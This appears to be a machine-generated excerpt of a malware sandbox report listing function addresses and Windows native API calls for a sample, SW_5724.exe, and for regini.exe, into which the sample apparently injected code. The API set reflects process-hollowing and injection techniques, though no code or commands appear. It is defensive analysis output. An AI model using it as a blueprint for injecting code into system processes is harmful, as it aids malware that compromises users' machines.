                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0042C903 NtClose,6_2_0042C903
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92B60 NtClose,LdrInitializeThunk,6_2_01A92B60
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_01A92DF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_01A92C70
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A935C0 NtCreateMutant,LdrInitializeThunk,6_2_01A935C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A94340 NtSetContextThread,6_2_01A94340
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A94650 NtSuspendThread,6_2_01A94650
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92BA0 NtEnumerateValueKey,6_2_01A92BA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92B80 NtQueryInformationFile,6_2_01A92B80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92BE0 NtQueryValueKey,6_2_01A92BE0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92BF0 NtAllocateVirtualMemory,6_2_01A92BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92AB0 NtWaitForSingleObject,6_2_01A92AB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92AF0 NtWriteFile,6_2_01A92AF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92AD0 NtReadFile,6_2_01A92AD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92DB0 NtEnumerateKey,6_2_01A92DB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92DD0 NtDelayExecution,6_2_01A92DD0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92D30 NtUnmapViewOfSection,6_2_01A92D30
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92D00 NtSetInformationFile,6_2_01A92D00
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92D10 NtMapViewOfSection,6_2_01A92D10
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92CA0 NtQueryInformationToken,6_2_01A92CA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92CF0 NtOpenProcess,6_2_01A92CF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92CC0 NtQueryVirtualMemory,6_2_01A92CC0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92C00 NtQueryInformationProcess,6_2_01A92C00
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92C60 NtCreateKey,6_2_01A92C60
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92FA0 NtQuerySection,6_2_01A92FA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92FB0 NtResumeThread,6_2_01A92FB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92F90 NtProtectVirtualMemory,6_2_01A92F90
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92FE0 NtCreateFile,6_2_01A92FE0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92F30 NtCreateSection,6_2_01A92F30
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92F60 NtCreateProcessEx,6_2_01A92F60
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92EA0 NtAdjustPrivilegesToken,6_2_01A92EA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92E80 NtReadVirtualMemory,6_2_01A92E80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92EE0 NtQueueApcThread,6_2_01A92EE0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A92E30 NtWriteVirtualMemory,6_2_01A92E30
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A93090 NtSetValueKey,6_2_01A93090
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A93010 NtOpenDirectoryObject,6_2_01A93010
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A939B0 NtGetContextThread,6_2_01A939B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A93D10 NtOpenProcessToken,6_2_01A93D10
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A93D70 NtOpenThread,6_2_01A93D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB4340 NtSetContextThread,LdrInitializeThunk,10_2_02DB4340
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB4650 NtSuspendThread,LdrInitializeThunk,10_2_02DB4650
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2AD0 NtReadFile,LdrInitializeThunk,10_2_02DB2AD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2AF0 NtWriteFile,LdrInitializeThunk,10_2_02DB2AF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_02DB2BF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2BE0 NtQueryValueKey,LdrInitializeThunk,10_2_02DB2BE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_02DB2BA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2B60 NtClose,LdrInitializeThunk,10_2_02DB2B60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2EE0 NtQueueApcThread,LdrInitializeThunk,10_2_02DB2EE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_02DB2E80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2FE0 NtCreateFile,LdrInitializeThunk,10_2_02DB2FE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2FB0 NtResumeThread,LdrInitializeThunk,10_2_02DB2FB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2F30 NtCreateSection,LdrInitializeThunk,10_2_02DB2F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_02DB2CA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_02DB2C70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2C60 NtCreateKey,LdrInitializeThunk,10_2_02DB2C60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2DD0 NtDelayExecution,LdrInitializeThunk,10_2_02DB2DD0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_02DB2DF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2D10 NtMapViewOfSection,LdrInitializeThunk,10_2_02DB2D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_02DB2D30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB35C0 NtCreateMutant,LdrInitializeThunk,10_2_02DB35C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB39B0 NtGetContextThread,LdrInitializeThunk,10_2_02DB39B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2AB0 NtWaitForSingleObject,10_2_02DB2AB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2B80 NtQueryInformationFile,10_2_02DB2B80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2EA0 NtAdjustPrivilegesToken,10_2_02DB2EA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2E30 NtWriteVirtualMemory,10_2_02DB2E30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2F90 NtProtectVirtualMemory,10_2_02DB2F90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2FA0 NtQuerySection,10_2_02DB2FA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2F60 NtCreateProcessEx,10_2_02DB2F60
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2CC0 NtQueryVirtualMemory,10_2_02DB2CC0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2CF0 NtOpenProcess,10_2_02DB2CF0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2C00 NtQueryInformationProcess,10_2_02DB2C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2DB0 NtEnumerateKey,10_2_02DB2DB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB2D00 NtSetInformationFile,10_2_02DB2D00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB3090 NtSetValueKey,10_2_02DB3090
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB3010 NtOpenDirectoryObject,10_2_02DB3010
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB3D70 NtOpenThread,10_2_02DB3D70
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DB3D10 NtOpenProcessToken,10_2_02DB3D10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_004893B0 NtCreateFile,10_2_004893B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00489520 NtReadFile,10_2_00489520
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00489620 NtDeleteFile,10_2_00489620
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_004896D0 NtClose,10_2_004896D0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_00489840 NtAllocateVirtualMemory,10_2_00489840
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F24780_2_027F2478
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0FF00_2_027F0FF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F23840_2_027F2384
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0A590_2_027F0A59
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0A220_2_027F0A22
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0AEF0_2_027F0AEF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0B730_2_027F0B73
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0B330_2_027F0B33
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F08AC0_2_027F08AC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F09300_2_027F0930
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F09060_2_027F0906
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F09C50_2_027F09C5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F098C0_2_027F098C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0E130_2_027F0E13
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F2E080_2_027F2E08
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0E8D0_2_027F0E8D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0F200_2_027F0F20
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0FE80_2_027F0FE8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0C7B0_2_027F0C7B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0CCC0_2_027F0CCC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0D590_2_027F0D59
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0D210_2_027F0D21
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F0D890_2_027F0D89
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F38F00_2_027F38F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 0_2_027F38E30_2_027F38E3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004187836_2_00418783
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004010D36_2_004010D3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004010E06_2_004010E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0041697E6_2_0041697E
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004101E36_2_004101E3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040E1E36_2_0040E1E3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004169836_2_00416983
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040E3276_2_0040E327
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040E3336_2_0040E333
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004045AC6_2_004045AC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_004026506_2_00402650
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0042EF736_2_0042EF73
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040FFC36_2_0040FFC3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_00402FB06_2_00402FB0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_0040FFBF6_2_0040FFBF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B141A26_2_01B141A2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B201AA6_2_01B201AA
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B181CC6_2_01B181CC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A501006_2_01A50100
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFA1186_2_01AFA118
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE81586_2_01AE8158
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF20006_2_01AF2000
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B203E66_2_01B203E6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6E3F06_2_01A6E3F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1A3526_2_01B1A352
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AE02C06_2_01AE02C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B002746_2_01B00274
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B205916_2_01B20591
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A605356_2_01A60535
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0E4F66_2_01B0E4F6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B044206_2_01B04420
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B124466_2_01B12446
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5C7C06_2_01A5C7C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A607706_2_01A60770
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A847506_2_01A84750
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7C6E06_2_01A7C6E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A629A06_2_01A629A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B2A9A66_2_01B2A9A6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A769626_2_01A76962
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A468B86_2_01A468B8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A8E8F06_2_01A8E8F0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A628406_2_01A62840
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6A8406_2_01A6A840
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B16BD76_2_01B16BD7
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1AB406_2_01B1AB40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5EA806_2_01A5EA80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A78DBF6_2_01A78DBF
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A5ADE06_2_01A5ADE0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6AD006_2_01A6AD00
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFCD1F6_2_01AFCD1F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B00CB56_2_01B00CB5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A50CF26_2_01A50CF2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60C006_2_01A60C00
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ADEFA06_2_01ADEFA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6CFE06_2_01A6CFE0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A52FC86_2_01A52FC8
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B02F306_2_01B02F30
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA2F286_2_01AA2F28
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A80F306_2_01A80F30
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD4F406_2_01AD4F40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1CE936_2_01B1CE93
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A72E906_2_01A72E90
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1EEDB6_2_01B1EEDB
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1EE266_2_01B1EE26
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A60E596_2_01A60E59
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A6B1B06_2_01A6B1B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9516C6_2_01A9516C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4F1726_2_01A4F172
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B2B16B6_2_01B2B16B
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1F0E06_2_01B1F0E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B170E96_2_01B170E9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A670C06_2_01A670C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0F0CC6_2_01B0F0CC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA739A6_2_01AA739A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1132D6_2_01B1132D
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A4D34C6_2_01A4D34C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A652A06_2_01A652A0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B012ED6_2_01B012ED
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7B2C06_2_01A7B2C0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFD5B06_2_01AFD5B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B295C36_2_01B295C3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B175716_2_01B17571
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1F43F6_2_01B1F43F
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A514606_2_01A51460
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1F7B06_2_01B1F7B0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B116CC6_2_01B116CC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA56306_2_01AA5630
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AF59106_2_01AF5910
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A699506_2_01A69950
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7B9506_2_01A7B950
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A638E06_2_01A638E0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01ACD8006_2_01ACD800
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7FB806_2_01A7FB80
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A9DBF96_2_01A9DBF9
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD5BF06_2_01AD5BF0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FB766_2_01B1FB76
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AFDAAC6_2_01AFDAAC
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AA5AA06_2_01AA5AA0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B01AA36_2_01B01AA3
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B0DAC66_2_01B0DAC6
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD3A6C6_2_01AD3A6C
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B17A466_2_01B17A46
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FA496_2_01B1FA49
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A7FDC06_2_01A7FDC0
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B17D736_2_01B17D73
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A63D406_2_01A63D40
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B11D5A6_2_01B11D5A
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FCF26_2_01B1FCF2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01AD9C326_2_01AD9C32
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FFB16_2_01B1FFB1
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A61F926_2_01A61F92
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A23FD26_2_01A23FD2
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A23FD56_2_01A23FD5
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01B1FF096_2_01B1FF09
                Source: C:\Users\user\Desktop\SW_5724.exeCode function: 6_2_01A69EB06_2_01A69EB0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E002C010_2_02E002C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2027410_2_02E20274
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E403E610_2_02E403E6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8E3F010_2_02D8E3F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3A35210_2_02E3A352
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1200010_2_02E12000
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E381CC10_2_02E381CC
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E341A210_2_02E341A2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E401AA10_2_02E401AA
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E0815810_2_02E08158
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7010010_2_02D70100
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1A11810_2_02E1A118
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9C6E010_2_02D9C6E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7C7C010_2_02D7C7C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DA475010_2_02DA4750
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8077010_2_02D80770
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2E4F610_2_02E2E4F6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3244610_2_02E32446
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2442010_2_02E24420
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E4059110_2_02E40591
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8053510_2_02D80535
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7EA8010_2_02D7EA80
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E36BD710_2_02E36BD7
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3AB4010_2_02E3AB40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DAE8F010_2_02DAE8F0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D668B810_2_02D668B8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8A84010_2_02D8A840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8284010_2_02D82840
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E4A9A610_2_02E4A9A6
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D829A010_2_02D829A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9696210_2_02D96962
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3EEDB10_2_02E3EEDB
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D92E9010_2_02D92E90
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3CE9310_2_02E3CE93
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D80E5910_2_02D80E59
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3EE2610_2_02E3EE26
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D72FC810_2_02D72FC8
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8CFE010_2_02D8CFE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DFEFA010_2_02DFEFA0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DF4F4010_2_02DF4F40
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E22F3010_2_02E22F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DA0F3010_2_02DA0F30
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC2F2810_2_02DC2F28
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D70CF210_2_02D70CF2
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E20CB510_2_02E20CB5
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D80C0010_2_02D80C00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D7ADE010_2_02D7ADE0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D98DBF10_2_02D98DBF
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D8AD0010_2_02D8AD00
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E1CD1F10_2_02E1CD1F
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E212ED10_2_02E212ED
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D9B2C010_2_02D9B2C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D852A010_2_02D852A0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02DC739A10_2_02DC739A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D6D34C10_2_02D6D34C
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3132D10_2_02E3132D
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E3F0E010_2_02E3F0E0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E370E910_2_02E370E9
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02D870C010_2_02D870C0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_02E2F0CC10_2_02E2F0CC
